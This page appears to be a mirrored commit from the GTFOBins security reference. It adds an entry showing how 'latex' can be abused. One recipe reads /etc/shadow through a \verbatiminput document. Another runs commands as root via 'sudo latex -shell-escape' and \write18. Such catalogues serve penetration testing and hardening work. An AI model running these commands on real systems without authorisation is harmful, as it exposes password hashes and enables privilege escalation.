mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Create latex.md
Add latex.
This commit is contained in:
		
							
								
								
									
										11
									
								
								_gtfobins/latex.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										11
									
								
								_gtfobins/latex.md
									
									
									
									
									
										Normal file
									
								
							@@ -0,0 +1,11 @@
 | 
			
		||||
description: `latex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
 | 
			
		||||
functions:
 | 
			
		||||
  file-read:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
 | 
			
		||||
        latex read.tex
 | 
			
		||||
        strings read.dvi
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: |
 | 
			
		||||
        echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
 | 
			
		||||
        sudo latex -shell-escape file.tex
 | 
			
		||||
		Reference in New Issue
	
	Block a user